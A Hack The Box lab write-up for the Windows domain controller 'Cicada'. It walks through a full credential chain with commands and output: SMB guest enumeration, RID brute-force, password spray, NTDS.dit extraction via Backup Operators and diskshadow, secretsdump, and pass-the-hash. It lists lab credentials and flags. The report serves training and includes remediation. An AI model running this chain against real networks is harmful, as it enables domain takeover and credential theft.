2026-05-21 • htb • easy • windows

HTB - Cicada

Guest SMB access exposes an HR share containing a default password in a staff notice. RID brute-force enumerates domain users, and a password spray yields initial access as michael.wrightson. LDAP user enumeration reveals a second password stored in david.orelious's account description. His access to the DEV share exposes a PowerShell backup script containing emily.oscars's credentials. Emily's membership in Remote Management Users grants a WinRM foothold. Her Backup Operators membership is abused to snapshot the C volume via VSS, extract NTDS.dit, and dump the Administrator NTLM hash for a pass-the-hash login.

smb-enumerationrid-brutepassword-spraypassword-in-descriptionbackup-operatorsvss-shadow-copyntds-dumppass-the-hash nmapnetexecsmbclientldapsearchevil-winrmsecretsdumpbloodhound

Hack The Box — Cicada

Easy | Windows | Hack The Box

Field	Value
Report Date	21 May 2026
Assessed By	RobInTheHood
Target IP	10.129.231.149
Hostname	CICADA-DC
Domain	cicada.htb

Executive Summary
Scope
Methodology
Attack Chain Summary
Findings
Proof of Access
Credentials Discovered
Impact Assessment
Remediation Summary
Key Takeaways
Tools Used
Disclaimer

1. Executive Summary

This report documents the compromise workflow for the Hack The Box machine Cicada. The objective was to obtain full system-level access in an authorised lab environment and document the attack path with reproducible evidence.

An SMB share accessible by the guest account contains an HR notice that discloses a default onboarding password. RID brute-force enumerates all domain user accounts, and a password spray identifies michael.wrightson as the recipient. Authenticated LDAP enumeration reveals a plaintext password stored in david.orelious’s account description field. His privileges expose the DEV share, which holds a PowerShell backup script containing the credentials of emily.oscars. Emily’s membership in the Remote Management Users group allows a WinRM connection via evil-winrm. Her membership in Backup Operators is then abused to create a VSS shadow copy of the C volume, extract NTDS.dit, and dump the domain Administrator NTLM hash using secretsdump. A pass-the-hash login completes the full domain compromise.

2. Scope

Field	Value
Target IP	10.129.231.149
Hostname	CICADA-DC
Domain	cicada.htb
Operating System	Windows Server 2022 Build 20348
Machine Rating	Easy
Environment	Hack The Box — Authorised Training Lab
Assessment Date	21 May 2026
Assessor	RobInTheHood

3. Methodology

Reconnaissance — service discovery and external attack-surface mapping
Enumeration — credential, configuration, and trust-path analysis
Exploitation — initial access through validated vulnerability paths
Lateral Movement — privilege pivoting and cross-context execution
Privilege Escalation — full compromise to root/SYSTEM context
Post-Exploitation — proof collection and impact-oriented validation

4. Attack Chain Summary

Phase	Technique	MITRE ATT&CK
Recon	Nmap — DNS, Kerberos, LDAP, SMB surface mapped	T1046
Enumeration	Guest SMB → HR share → default password in staff notice	T1135
Enumeration	RID brute-force → domain user list	T1087.002
Initial Access	Password spray → `michael.wrightson` authenticated	T1110.003
Enumeration	LDAP user dump → password in `david.orelious` description field	T1552.001
Lateral Movement	DEV share → `Backup_script.ps1` → `emily.oscars` credentials	T1552.001
Initial Foothold	WinRM as `emily.oscars` → user flag	T1021.006
Privilege Escalation	Backup Operators → VSS snapshot → NTDS.dit extraction → Admin NTLM hash	T1003.003 · T1550.002

5. Findings

F-01 — Technical Walkthrough

Reconnaissance

nmap -sC -sV 10.129.231.149 -oN nmap.txt

Port	Service
53/tcp	DNS
88/tcp	Kerberos
135/tcp	MSRPC
139/tcp	NetBIOS-SSN
389/tcp	LDAP
445/tcp	SMB2

The presence of Kerberos (88) and LDAP (389) alongside SMB confirms a Domain Controller. The combination of a guest-accessible SMB and a writable IPC$ makes unauthenticated enumeration the natural starting point.

Enumeration — SMB Guest Access

Initial SMB enumeration with a null/guest session reveals the share layout:

nxc smb 10.129.231.149 -u 'guest' -p '' --shares

Share       Permissions     Remark
-----       -----------     ------
ADMIN$                      Remote Admin
C$                          Default share
DEV
HR          READ
IPC$        READ            Remote IPC
NETLOGON                    Logon server share
SYSVOL                      Logon server share

The HR share is readable without credentials. Connecting to it reveals a staff notice:

smbclient //cicada.htb/HR -U ''

smb: \> ls
  Notice from HR.txt   A   1266   Wed Aug 28 13:31:48 2024

The notice contains a domain-wide default onboarding password:

New Hire
Your default password is: Cicada$M6Corpb*@Lp#nZp!8

A password without a username calls for user enumeration before any authentication can be attempted.

Enumeration — RID Brute-Force

nxc smb 10.129.231.149 -u 'guest' -p '' --rid-brute 2>/dev/null | grep "SidTypeUser"

500: CICADA\Administrator
501: CICADA\Guest
502: CICADA\krbtgt
1000: CICADA\CICADA-DC$
1104: CICADA\john.smoulder
1105: CICADA\sarah.dantelia
1106: CICADA\michael.wrightson
1108: CICADA\david.orelious
1601: CICADA\emily.oscars

Initial Access — Password Spray

The recovered default password is tested against the enumerated user list via LDAP authentication:

ldapsearch -x -H ldap://10.129.231.149 -b "DC=cicada,DC=htb" \
  -D "michael.wrightson@cicada.htb" -w 'Cicada$M6Corpb*@Lp#nZp!8'

Authentication succeeds for michael.wrightson, confirming the credential pair:

michael.wrightson : Cicada$M6Corpb*@Lp#nZp!8

Enumeration — Password in Account Description

With valid credentials, authenticated LDAP enumeration surfaces all domain users and their description fields:

nxc ldap 10.129.231.149 -u "michael.wrightson@cicada.htb" \
  -p 'Cicada$M6Corpb*@Lp#nZp!8' -k --users

-Username-          -Last PW Set-       -BadPW-  -Description-
Administrator       2024-08-26 16:08:03 0        Built-in account for administering...
Guest               2024-08-28 13:26:56 0        Built-in account for guest access...
krbtgt              2024-03-14 07:14:10 0        Key Distribution Center Service Account
john.smoulder       2024-03-14 08:17:29 0
sarah.dantelia      2024-03-14 08:17:29 1
michael.wrightson   2024-03-14 08:17:29 0
david.orelious      2024-03-14 08:17:29 0        Just in case I forget my password is aRt$Lp#7t*VQ!3
emily.oscars        2024-08-22 17:20:17 0

david.orelious has stored his password in the description attribute, a field world-readable by any authenticated domain user:

david.orelious : aRt$Lp#7t*VQ!3

Enumerating SMB shares with David’s credentials reveals access to the DEV share:

nxc smb 10.129.231.149 -u 'david.orelious@cicada.htb' -p 'aRt$Lp#7t*VQ!3' -k --shares

Share       Permissions
-----       -----------
DEV         READ
HR          READ
IPC$        READ
NETLOGON    READ
SYSVOL      READ

smbclient //cicada.htb/DEV -U 'david.orelious@cicada.htb' --use-kerberos

smb: \> ls
  Backup_script.ps1   A   601   Wed Aug 28 13:28:22 2024

The PowerShell backup script contains hardcoded credentials:

$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)

emily.oscars : Q!3@Lp#M6b*7t*Vt

Foothold — WinRM as emily.oscars

Emily’s SMB share permissions confirm elevated access:

nxc smb 10.129.231.149 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt' -k --shares

Share       Permissions
-----       -----------
ADMIN$      READ
C$          READ,WRITE
HR          READ
IPC$        READ
NETLOGON    READ
SYSVOL      READ

BloodHound collection confirms Emily is a member of Remote Management Users, enabling a WinRM session:

evil-winrm -i 10.129.231.149 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'

Evil-WinRM shell v3.7

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents>

User Flag

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> dir "C:/Users/emily.oscars.CICADA/Desktop/"

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---         5/21/2026  10:08 PM             34 user.txt

USER FLAG : 809b8b7f6b65957f74ffa408194126ff

Privilege Escalation — Backup Operators → NTDS.dit Extraction

BloodHound identifies Emily as a member of Backup Operators. This group grants SeBackupPrivilege and SeRestorePrivilege, which bypass DACL checks on file reads — a well-known path to extracting NTDS.dit via Volume Shadow Copy.

Step 1 — Create a VSS shadow copy using a diskshadow script:

set verbose on
set metadata C:\Windows\Temp\meta.cab
set context persistent
begin backup
add volume C: alias myAlias
create
expose %myAlias% Z:
end backup
exit

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> upload /workspace/shadow.txt .
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> diskshadow /s shadow.txt

The shadow copy is exposed as Z:\.

Step 2 — Copy NTDS.dit from the shadow:

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> robocopy /b Z:\Windows\NTDS\ C:\Windows\Temp\ ntds.dit

Step 3 — Export SAM and SYSTEM hives:

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> reg save HKLM\SYSTEM SYSTEM.SAV
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> reg save HKLM\SAM SAM.SAV

Step 4 — Download and dump offline:

secretsdump -sam SAM.SAV -system SYSTEM.SAV -ntds ntds.dit LOCAL

[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::

Root Flag — Pass-the-Hash

evil-winrm -i 10.129.231.149 -u 'Administrator' -H "2b87e7c93a3e8a0ea4a581937016f341"

Evil-WinRM shell v3.7

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator> type "C:/Users/Administrator/Desktop/root.txt"
4a9b681568929984ac530fdc12d3521f

6. Proof of Access

Level	Evidence
User	`809b8b7f6b65957f74ffa408194126ff`
Root	`4a9b681568929984ac530fdc12d3521f`

7. Credentials Discovered

Account	Secret	Type	Source
`michael.wrightson`	`Cicada$M6Corpb*@Lp#nZp!8`	Domain password	Default onboarding password in HR share notice
`david.orelious`	`aRt$Lp#7t*VQ!3`	Domain password	Plaintext in LDAP `description` attribute
`emily.oscars`	`Q!3@Lp#M6b7tVt`	Domain password	Hardcoded in `Backup_script.ps1` on DEV share
`Administrator`	`2b87e7c93a3e8a0ea4a581937016f341`	NTLM hash	NTDS.dit dump via VSS + secretsdump

8. Impact Assessment

Successful exploitation resulted in full domain compromise through a chain of credential exposures rather than any single high-severity vulnerability. Each step was self-contained and relied entirely on misconfiguration: a default password broadcast in plaintext over SMB, a domain account self-documenting its own password in a world-readable field, a script storing credentials in cleartext on a network share, and a group membership that enables offline extraction of the entire domain credential store. No exploit code was required at any stage.

9. Remediation Summary

Priority	Action
Critical	Enforce unique, per-user initial passwords delivered out-of-band (e.g., encrypted email or in-person); never broadcast a domain-wide default password over a network share.
Critical	Enforce an AD policy that prohibits use of `description`, `info`, or any user-readable attribute for password storage; implement LAPS for local admin credentials.
Critical	Remove hardcoded credentials from scripts; use managed service accounts or a secrets manager (e.g., HashiCorp Vault, Windows Credential Manager with DPAPI).
High	Audit Backup Operators membership; the group effectively grants read access to all files on the system. Remove users who do not require offline backup duties.
High	Restrict SMB guest access; guest enumeration should return no shares and no user information.
Medium	Enable SMB signing to prevent relay attacks against the same infrastructure.

10. Key Takeaways

A single shared default onboarding password across all new hires, stored on an anonymous-readable SMB share, collapses the entire initial-access phase to one file read.
The LDAP description attribute is world-readable by any authenticated domain user; it is regularly abused for credential storage and should be treated as a public field.
Backup Operators is a high-privilege group that receives little scrutiny compared to Domain Admins — yet it provides a direct, documented path to full domain credential extraction via VSS.
Credential chaining (HR notice → michael → david’s description → emily’s script → Administrator hash) is characteristic of real-world Active Directory environments where each account is slightly more privileged than the last.

11. Tools Used

Tool	Purpose
`nmap`	Port and service discovery
`netexec (nxc)`	SMB share enumeration, RID brute-force, LDAP user dump, BloodHound collection
`smbclient`	Manual share browsing and file retrieval
`ldapsearch`	Authenticated LDAP query for initial credential validation
`BloodHound`	AD relationship analysis — group memberships and attack paths
`evil-winrm`	WinRM foothold and pass-the-hash authentication
`diskshadow`	VSS shadow copy creation for NTDS.dit access
`secretsdump`	Offline NTLM hash extraction from NTDS.dit + SYSTEM hive

12. Disclaimer

This assessment was performed exclusively in an authorised Hack The Box training environment for educational and portfolio purposes.

End of Report — Cicada | RobInTheHood | 21 May 2026